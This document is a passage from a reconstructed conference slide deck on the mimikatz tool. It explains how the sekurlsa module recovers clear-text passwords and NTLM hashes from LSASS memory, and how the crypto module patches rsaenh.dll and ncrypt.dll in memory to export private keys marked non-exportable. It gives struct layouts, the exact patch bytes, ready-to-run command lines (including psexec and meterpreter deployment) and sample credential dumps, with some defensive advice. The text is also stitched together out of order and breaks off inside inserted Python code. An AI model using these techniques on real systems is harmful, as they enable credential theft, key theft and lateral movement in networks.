        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account.
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for the password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6), workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → lookup in kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

mimikatz :: sekurlsa :: kerberos (nt5), workflow
Workflow: LsaEnumerateLogonSessions → for each LUID → walk kerberos!KerbLogonSessionList → search the linked list for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

mimikatz :: sekurlsa, demo time!
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos, "hu ?"
Ok. It works…
But why?
Not for all logons on NT5 (can need an unlock)
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on the client
  • No hash on the client
  – NTLM hash on the client…
  – the KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– this function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
– when we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory, NT5
Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx
Diagram (NT5 keys, read from lsasrv inside lsass and copied… into mimikatz's own lsasrv):
    lsasrv!g_cbRandomKey : DWORD (256)
    lsasrv!g_pRandomKey  : BYTE[g_cbRandomKey]
    lsasrv!g_pDESXKey    : BYTE[144]
    lsasrv!g_Feedback    : BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory, NT6
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
Diagram (NT6 keys, read from lsasrv inside lsass and copied… into mimikatz):
    lsasrv!InitializationVector : BYTE[16]
    lsasrv!h3DesKey, lsasrv!hAesKey : handles to the structures below

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data[];   /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

mimikatz :: sekurlsa, memo
Security Packages

    Package          Symbols                                   Type
    tspkg            tspkg!TSGlobalCredTable                   RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                     LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList        LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList             LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable      RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList                   LIST_ENTRY
                     lsasrv!LogonSessionListCount              ULONG

Protection Keys

    Key     NT 5 symbols
    RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key     NT 6 symbols
            lsasrv!InitializationVector
    3DES    lsasrv!h3DesKey
    AES     lsasrv!hAesKey

mimikatz :: sekurlsa, memo
Some commands:
    mimikatz privilege::debug sekurlsa::logonPasswords full exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
    mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
    // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Request to ENABLE privilege : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full
    Authentication Id        : 0;234870
    Authentication package   : NTLM
    Primary user             : Gentil Kiwi
    Authentication domain    : vm-w8-rp-x
            msv1_0 :
             * User      : Gentil Kiwi
             * Domain    : vm-w8-rp-x
             * LM hash   : d0e9aee149655a6075e4540af1f22d3b
             * NTLM hash : cc36cf7a8514893efccd332446158b1a
            kerberos :
             * User      : Gentil Kiwi
             * Domain    : vm-w8-rp-x
             * Password  : waza1234
            wdigest :
             * User      : Gentil Kiwi
             * Domain    : vm-w8-rp-x
             * Password  : waza1234
            tspkg :
             * User      : Gentil Kiwi
             * Domain    : vm-w8-rp-x
             * Password  : waza1234
            livessp :
            n.t. (LUID KO)
mimikatz :: sekurlsa, what can we do?
Basics
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless)
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Let opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto, what is it?
A little module that I wrote to
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz's context
  • CNG in LSASS's context (again)
mod_mimikatz_crypto
mimikatz :: crypto, how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • at least not without the master keys and/or the users' passwords
A computer/user can load its own keys because it has enough secrets to do it (ex: an opened session)
– Yes, a computer/server opens a "session"
Export/usage can be limited by
– Password
– Popup
– Export/Archive flag not present
A constraint for most users; unavailable for computer keys
    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi, how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi, how it's exported
Flowchart (PLAYSKOOL level): the Process asks CryptoAPI / the RSA CSP to export a key → Exportable? → yes: Load Private Key → DPAPI decode → Exported Key; no: NTE_BAD_KEY_STATE
mimikatz :: crypto :: patch::capi, because I own my process
When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz :: crypto :: patchcapi – because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

Before (rsaenh.dll):
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
After:
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

Before:
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
After:
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi – demo time
Import, export, import as not exportable…, export.
mimikatz :: crypto :: patchcapi – limitations
Because
– I'm lazy
– In the majority of cases I've seen RSA keys in real-life use; Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng – how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng – how it's exported ( level)
[Diagram: the process calls CNG, which goes over RPC to the KeyIso service inside the LSASS process (NT6 "System protected process": ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP); the service loads the private key (DPAPI decode) and checks the "Exportable" flag: yes → exported key, no → NTE_NOT_SUPPORTED.]
mimikatz :: crypto :: patchcng – because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
   Exportabilité : NON
   Taille clé : 2048
   Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKeyPrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng – because sometimes I own LSASS
This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

Before (ncrypt.dll):
.text:6C815210 75 1C    jnz short continue_key_export
After:
.text:6C815210 EB 1C    jmp short continue_key_export
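Both patches (the two rsaenh sites on the patchcapi slide and the ncrypt site here) rewrite only the opcode and keep the original displacement. The following Python is an added example, not code from the talk or from mimikatz: it decodes the exact bytes printed on the slides and checks that the patched instruction stream unconditionally reaches the same target the original jnz went to, which is the reason the displacement bytes could stay untouched. Site labels are mine; addresses and bytes are the slides' own.

```python
import struct

# The handful of x86 encodings that occur on the slides:
#   0F 85 rel32 : jnz near  (6 bytes)     75 rel8 : jnz short (2 bytes)
#   E9 rel32    : jmp near  (5 bytes)     EB rel8 : jmp short (2 bytes)
#   90          : nop       (1 byte)
# A branch target is computed from the END of the branch instruction, so
# "90 + E9 rel32" (1 + 5 bytes) ends where "0F 85 rel32" (6 bytes) ended
# and the same rel32 resolves to the same address.
def disassemble(addr, code):
    """Return [(address, mnemonic, target)]; target is None for nop."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0x90:
            out.append((addr + i, "nop", None)); n = 1
        elif op == 0x0F and code[i + 1] == 0x85:
            rel = struct.unpack_from("<i", code, i + 2)[0]
            out.append((addr + i, "jnz", (addr + i + 6 + rel) & 0xFFFFFFFF)); n = 6
        elif op == 0xE9:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            out.append((addr + i, "jmp", (addr + i + 5 + rel) & 0xFFFFFFFF)); n = 5
        elif op == 0x75:
            rel = struct.unpack_from("<b", code, i + 1)[0]
            out.append((addr + i, "jnz", (addr + i + 2 + rel) & 0xFFFFFFFF)); n = 2
        elif op == 0xEB:
            rel = struct.unpack_from("<b", code, i + 1)[0]
            out.append((addr + i, "jmp", (addr + i + 2 + rel) & 0xFFFFFFFF)); n = 2
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at {addr + i:#010x}")
        i += n
    return out


def patch_effect(addr, original, patched):
    """Compare a conditional-branch site with its patched bytes.

    Returns (original_target, patched_target, forced). `forced` is True when
    the patched bytes consist only of nops and unconditional jmps that land
    exactly where the original jnz went, i.e. the "not exportable" fall-through
    can no longer be reached. A plain nop-out is NOT equivalent: it would
    always fall through instead of always branching.
    """
    if len(original) != len(patched):
        raise ValueError("patch must not change the instruction stream length")
    orig = disassemble(addr, original)
    new = disassemble(addr, patched)
    cond = [t for _, m, t in orig if m == "jnz"]
    if len(cond) != 1:
        raise ValueError("expected exactly one conditional branch at the site")
    jmps = [t for _, m, t in new if m == "jmp"]
    forced = all(m in ("nop", "jmp") for _, m, _ in new) and jmps == [cond[0]]
    return cond[0], (jmps[0] if jmps else None), forced


def bytes_changed(original, patched):
    """How many bytes the patch actually rewrote (the talk's "4" and "1")."""
    return sum(1 for a, b in zip(original, patched) if a != b)


# Patch sites exactly as printed on the slides (labels are mine).
PATCH_SITES = {
    "rsaenh!CPExportKey check #1": (0x0AC0B7CB, bytes.fromhex("0F8533C7FFFF"), bytes.fromhex("90E933C7FFFF")),
    "rsaenh!CPExportKey check #2": (0x0AC1F749, bytes.fromhex("0F85B63BFFFF"), bytes.fromhex("90E9B63BFFFF")),
    "ncrypt!SPCryptExportKey check": (0x6C815210, bytes.fromhex("751C"), bytes.fromhex("EB1C")),
}


def report():
    """One row per site: (label, jnz target, patched target, forced, bytes changed)."""
    rows = []
    for name, (addr, before, after) in PATCH_SITES.items():
        t0, t1, forced = patch_effect(addr, before, after)
        rows.append((name, t0, t1, forced, bytes_changed(before, after)))
    return rows


if __name__ == "__main__":
    for name, t0, t1, forced, n in report():
        print(f"{name}: jnz -> {t0:#010x}, patched -> {t1:#010x}, "
              f"forced={forced}, bytes changed={n}")
```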
mimikatz :: crypto :: patchcng – demo time
Import, export, import as not exportable…, export again.
mimikatz :: crypto :: patchcng – limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?) – certutil can…
mimikatz :: crypto :: patchcng – bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto – memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto – what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz – what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz – that's all folks!
Thanks to (Merci à)
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa – what is it?
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (the well-known LSASS process)
What the sekurlsa module can dump:
– MSV1_0 hashes
– TsPkg passwords
– Wdigest passwords
– LiveSSP passwords
– Kerberos passwords
– …
mod_mimikatz_sekurlsa
mimikatz :: sekurlsa – how LSA works ( level)
[Diagram: WinLogon hands user/domain/password to LSASS; the LSASS authentication packages (msv1_0, tspkg, wdigest, livessp, kerberos) perform the authentication: msv1_0 validates against the SAM, kerberos by challenge/response.]
mimikatz :: sekurlsa – how LSA works ( level)
Authentication packages
– take the user's credentials from the logon
– make their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get that data and inject it into another LSASS session, we skip the authentication part.
This is the principle of « Pass-the-hash »
– In fact, of « Pass-the-x »
mimikatz :: sekurlsa – history of « pass-the-x » 1/2
Pass-the-hash
– 1997 – Unix: modified SAMBA client for hash usage, Paul Ashton (EIGEN)
– 2000 – Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
– 2007 – TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
– 2007 – « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
– 2007 – mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
– 04/2011 – wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa – history of « pass-the-x » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases with Microsoft about it…
…Lots of time…
– beginning of 2012 – Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 – Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg – what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience – http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation) – Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
– User does not have to type their password
– Password is not in the RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg – questions
KB says that for it to work we must enable « Default credentials » delegation – "Default credentials: The credentials obtained when the user first logs on to Windows" – https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems… – In all cases the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server." (or PIN)
    TSPasswordCreds ::= SEQUENCE {
      domainName [0] OCTET STRING,
      userName   [1] OCTET STRING,
      password   [2] OCTET STRING
    }
– Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, password is sent to server…
So the password resides somewhere in memory!
mimikatz :: sekurlsa :: tspkg – symbols & theory
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg – demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest – what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" Wikipedia – http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP" Microsoft – http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest - what is it?

We speak about hashes, but which hashes?
  H = MD5(HA1:nonce:[...]:HA2)
  * HA1 = MD5(username:realm:password)
  * HA2 = MD5(method:digestURI:[...])

Even after login, HA1 may change: the realm comes from the server side and cannot be determined before the Windows logon.

So the WDigest provider must keep the elements needed to compute responses for different servers:
- Username
- Realm (from the server)
- Password
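The computation above, worked through as an added example (not code from the talk or from mimikatz): a client answers a Digest challenge from the stored password, and the same answer is produced from HA1 alone, which is why a stolen HA1 is as good as the password for its realm and useless for any other. It uses only the Python standard library; the challenge header and credentials are the constructed sample values of RFC 2617 section 3.5 (user "Mufasa", password "Circle Of Life"), not a capture.

```python
"""Digest authentication (RFC 2617) worked end to end.

Added example for this page; it is not mimikatz code.  Only the standard
library is used.  The challenge and credentials are the RFC 2617 section
3.5 sample values, embedded here as constructed test data."""
import hashlib
import re

# Constructed WWW-Authenticate header, values from RFC 2617 section 3.5.
SAMPLE_CHALLENGE = (
    'Digest realm="testrealm@host.com", qop="auth,auth-int", '
    'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
    'opaque="5ccc069c403ebaf9f0171e9517f40e41"'
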